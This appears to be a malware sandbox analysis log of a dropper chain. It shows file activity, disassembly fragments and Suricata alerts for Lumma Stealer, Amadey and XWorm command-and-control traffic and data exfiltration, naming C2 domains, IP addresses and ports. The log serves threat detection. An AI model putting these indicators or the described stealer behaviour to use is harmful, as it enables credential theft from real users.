Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: 3Mv6i65.exe, 00000014.00000003.2103500843.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2828855279.00007FFB23AD4000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 3Mv6i65.exe, 00000014.00000003.2103305041.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2778234143.00007FFB22769000.00000002.00000001.01000000.00000018.sdmp, _socket.pyd.20.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: 3Mv6i65.exe, 00000014.00000003.2103500843.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2828855279.00007FFB23AD4000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: 3Mv6i65.exe, 00000014.00000003.2101423522.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2790258052.00007FFB22785000.00000002.00000001.01000000.00000017.sdmp, VCRUNTIME140_1.dll.20.dr
Source:	Binary string: System.ni.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00CF2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FAEF71 FindFirstFileExW,	2_2_00FAEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004AEF71 FindFirstFileExW,	6_2_004AEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004AEF71 FindFirstFileExW,	14_2_004AEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004AEF71 FindFirstFileExW,	15_2_004AEF71

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CA198B66h	8_2_0086A030
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [eax], cl	8_2_0083284C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [eax], cl	8_2_0083284C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]	8_2_0083284C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]	8_2_0086F870
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov word ptr [ecx], dx	8_2_0086F870
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then lea ecx, dword ptr [eax+2D321BFEh]	8_2_00833183
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6D58C181h	8_2_00866170
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-62h]	8_2_008512E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-014B2F66h]	8_2_0082FAE9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	8_2_0086FBA0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_00857B25
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00857B25
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	8_2_0086E420
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]	8_2_00858C5C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	8_2_0086E550
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov ebp, edx	8_2_0086E550
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	8_2_0086FD60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-004F7DAAh]	8_2_0086F630
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov word ptr [ecx], dx	8_2_0086F630
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov esi, eax	8_2_0083BFAA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [edx], al	8_2_00857899
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	8_2_008670E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]	8_2_008670E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-444800C2h]	8_2_008508F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	8_2_008508F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_008428F8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	8_2_0085500F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [edx], al	8_2_0085783A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	8_2_0083B040
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx eax, byte ptr [edx+esi-444800C2h]	8_2_00850042
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_00859063
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	8_2_0086A980
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	8_2_0086A980
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_008581B4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_008581B4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h	8_2_0083D91E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then jmp ecx	8_2_00854948
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	8_2_0084A950
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80A4h]	8_2_00841160
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 64DAE379h	8_2_00841160
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], CA198B66h	8_2_00841160
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	8_2_0084A2B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_00842E97
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_00842E97
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	8_2_00856AF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movsx esi, byte ptr [ebx+eax]	8_2_0086DAF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+esi]	8_2_0086DAF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]	8_2_0086DAF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	8_2_0086EA10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	8_2_0082A220
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	8_2_0082A220
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]	8_2_00867A40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]	8_2_0083D25F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]	8_2_0083C74B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	8_2_00843382
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then push 00000000h	8_2_0085039F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx]	8_2_008543D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov edx, dword ptr [ebp-24h]	8_2_00853343
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+edx]	8_2_00853343
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00863350
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov dword ptr [esp+000000D0h], 00000000h	8_2_0083D361
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	8_2_00846370
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	8_2_00849CE0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [eax], cl	8_2_00832CEC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]	8_2_00832CEC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [eax], cl	8_2_00859404
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_00855430
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov dword ptr [esp+2Ch], ebx	8_2_00830C50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h	8_2_0086A580
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh	8_2_0086ED50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ebp, word ptr [ecx]	8_2_0086ED50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov edx, dword ptr [ebp-24h]	8_2_00853680
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+edx]	8_2_00853680
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00859E9A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00859E9A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx]	8_2_0082BEA0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then jmp ecx	8_2_008546F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	8_2_008546F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6AB32A06h]	8_2_008546F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov dword ptr [esp], edx	8_2_00842EFA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00853E60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00858F82
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00858F82
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00858F93
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00858F93
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-06E9A8FEh]	8_2_008407F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [edx], al	8_2_008577FA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [ecx], dl	8_2_0083DF2A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00858F44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_00858F44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA7F80h]	8_2_0083C74B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]	8_2_00851760
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then jmp eax	8_2_00851760
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	8_2_00851760
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+10h]	19_2_00FDF870
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov word ptr [ecx], dx	19_2_00FDF870
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [eax], cl	19_2_00FA284C
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [eax], cl	19_2_00FA284C
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]	19_2_00FA284C
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], CA198B66h	19_2_00FDA030
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	19_2_00FDE420
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then lea ecx, dword ptr [eax+2D321BFEh]	19_2_00FA3183
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	19_2_00FDE550
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov ebp, edx	19_2_00FDE550
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-014B2F66h]	19_2_00F9FAE9
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-62h]	19_2_00FC12E0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-004F7DAAh]	19_2_00FDF630
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov word ptr [ecx], dx	19_2_00FDF630
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	19_2_00FDFBA0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-444800C2h]	19_2_00FC08F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	19_2_00FC08F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov byte ptr [eax], cl	19_2_00FA2CEC
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx+15B2AB34h]	19_2_00FA2CEC
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov dword ptr [esp+2Ch], ebx	19_2_00FA0C50
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	19_2_00FAB040
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	19_2_00FC5430
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1D56B138h]	19_2_00FDFD60
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	19_2_00FC6AF0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then jmp ecx	19_2_00FC46F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	19_2_00FC46F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6AB32A06h]	19_2_00FC46F0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movsx esi, byte ptr [ebx+eax]	19_2_00FDDAF0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+esi]	19_2_00FDDAF0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx-6A88C35Ch]	19_2_00FDDAF0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx]	19_2_00F9BEA0
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2FBA80AFh]	19_2_00FD7A40
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	19_2_00F9A220
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	19_2_00F9A220
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	19_2_00FDEA10
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then mov ecx, dword ptr [00FE8390h]	19_2_00FA37A2
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]	19_2_00FC1760
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then jmp eax	19_2_00FC1760
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	19_2_00FC1760

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060528 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (circujitstorm .bet) : 192.168.2.7:53448 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49702 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49700 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49701 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.7:49792 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49978 -> 176.113.115.6:80
Source: Network traffic	Suricata IDS: 2060538 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu) : 192.168.2.7:62876 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:49981 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:49985 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:49986 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:49994 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:49996 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:50002 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2060539 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI) : 192.168.2.7:50005 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.7:50013 -> 178.250.188.144:22635
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:50013 -> 178.250.188.144:22635
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 178.250.188.144:22635 -> 192.168.2.7:50013
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 178.250.188.144:22635 -> 192.168.2.7:50013
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49702 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49985 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49792 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49997 -> 104.21.67.123:443
